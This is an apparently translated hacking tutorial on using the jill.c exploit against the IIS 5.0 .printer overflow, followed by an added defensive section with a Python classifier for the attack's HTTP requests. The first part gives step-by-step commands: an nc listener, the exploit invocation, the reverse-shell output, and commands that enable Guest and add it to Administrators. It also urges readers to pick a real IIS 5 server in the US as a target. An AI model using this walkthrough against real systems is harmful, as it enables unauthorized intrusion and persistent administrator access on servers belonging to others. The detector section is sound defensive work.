Download: http://hack.wudu.net/download/wdsoft/01-jill.c
This hole was found by eEye, and attack tools for it are already circulating on the net; jill.c is one of them. It targets the IIS 5.0 .printer ISAPI extension overflow (the fix is Microsoft's MS01-023 patch, so a patched server will not fall to it). Here is how to use it:
1. Compile jill.c on a unix-like system; once it builds, read the usage notes that come with it.
Roughly:
# ./jill <victim host> <victim port> <attacker host> <attacker port>
(the argument order is the one used in step 3 below). Nothing there needs much explanation except the last argument, the port the attacker is listening on. What does that mean?
Read on.
2. On your own machine, use nc to listen on any port.
Usage:
D:\>nc -l -p xxx -vv
listening on [any] xxx ...
xxx is whatever port you want to listen on. Note that nc is only listening here; it does not "bind cmd.exe" itself. jill's payload starts cmd.exe on the target and connects back to this host and port (a reverse shell), so the port must be reachable from the target. Once the listener is up you can try the attack. Pick an IIS 5 box in the US.
3. Start the listener, then launch the attack.
Listener:
D:\>nc -l -p 199 -vv
listening on [any] 199 ...
Attack:
# ./jill xxx.xxx.xx.xx 80 xx.xxx.xx.xx 199
iis5 remote .printer overflow.
dark spyrit / beavuh labs.
connecting...
sent...
you may need to send a carriage on your listener if the
shell doesn't appear.
have fun!
199 above is the port I am listening on (if no prompt shows up after "sent...", press Enter once in the nc window, as jill's message says). Look:
D:\>nc -l -p 199 -vv
listening on [any] 199 ...
xxx.xxx.xx.xx: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [xx.xxx.xxx.xx] from (UNKNOWN) [xx.xxx.xxx.xx] 3631
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT>net user guest /active
net user guest /active
The command completed successfully.

C:\WINNT>net localgroup administrators guest /add
net localgroup administrators guest /add
The command completed successfully.
Heh, admin rights! What can't you do now? :)
Two things worth knowing about those last commands: the shell jill hands you already runs with the IIS service's privileges (LocalSystem on a default IIS 5 install), so enabling Guest and putting it in Administrators is persistence, not privilege escalation; and both changes (an account enabled, a group membership change) are exactly what an administrator or incident responder will spot first in the Security event log.
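From the defender's side, the request jill.c sends is easy to recognise: an HTTP request for any *.printer resource whose Host: header is far longer than any real hostname. The following is an added example, not code from the original post or from jill.c: a small offline classifier over raw HTTP requests that separates normal traffic, .printer probes (a short Host header, the way scanners check whether the msw3prt.dll mapping exists) and overflow attempts. The 256-byte limit is an assumption chosen for this example (eEye's advisory put the trigger at about 420 bytes) and the sample requests are constructed, not a real capture.

```python
# Added example: offline detector for the IIS 5 .printer overflow request
# pattern. Not part of the original post or of jill.c.

# Assumption: a legitimate Host header is a hostname plus optional port, so
# anything beyond this on a .printer request is treated as an overflow attempt.
HOST_LIMIT = 256


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers).

    Header names are lower-cased. A request whose request line or headers
    are malformed returns None instead of raising.
    """
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3:
        return None
    method, path, _version = parts
    headers = {}
    for line in lines[1:]:
        if b":" not in line:
            return None
        name, value = line.split(b":", 1)
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def classify(raw):
    """Return 'malformed', 'benign', 'printer-probe' or 'printer-overflow'."""
    parsed = parse_request(raw)
    if parsed is None:
        return "malformed"
    _method, path, headers = parsed
    # Look at the extension only, ignoring any query string.
    resource = path.split(b"?", 1)[0].lower()
    if not resource.endswith(b".printer"):
        return "benign"
    host = headers.get(b"host", b"")
    if len(host) > HOST_LIMIT:
        return "printer-overflow"
    # A .printer request with a sane Host header is how scanners test
    # whether the .printer ISAPI mapping is present at all.
    return "printer-probe"


def scan(requests):
    """Classify each request and return (index, verdict) for the non-benign ones."""
    verdicts = ((i, classify(r)) for i, r in enumerate(requests))
    return [(i, v) for i, v in verdicts if v != "benign"]


# Constructed sample traffic for this example (not a real capture).
SAMPLES = [
    b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n",
    b"GET /NULL.printer HTTP/1.0\r\nHost: www.example.com\r\n\r\n",
    b"GET /NULL.printer HTTP/1.0\r\nHost: " + b"A" * 420 + b"\r\n\r\n",
    b"GARBAGE\r\n\r\n",
]

if __name__ == "__main__":
    for index, verdict in scan(SAMPLES):
        print(index, verdict)
```

Running it prints one line per non-benign sample (the probe, the overflow and the malformed request). Feeding it real traffic means splitting the stream into requests first; the classifier deliberately keys on the URL extension plus header length rather than on jill's shellcode bytes, so a re-encoded payload still trips it.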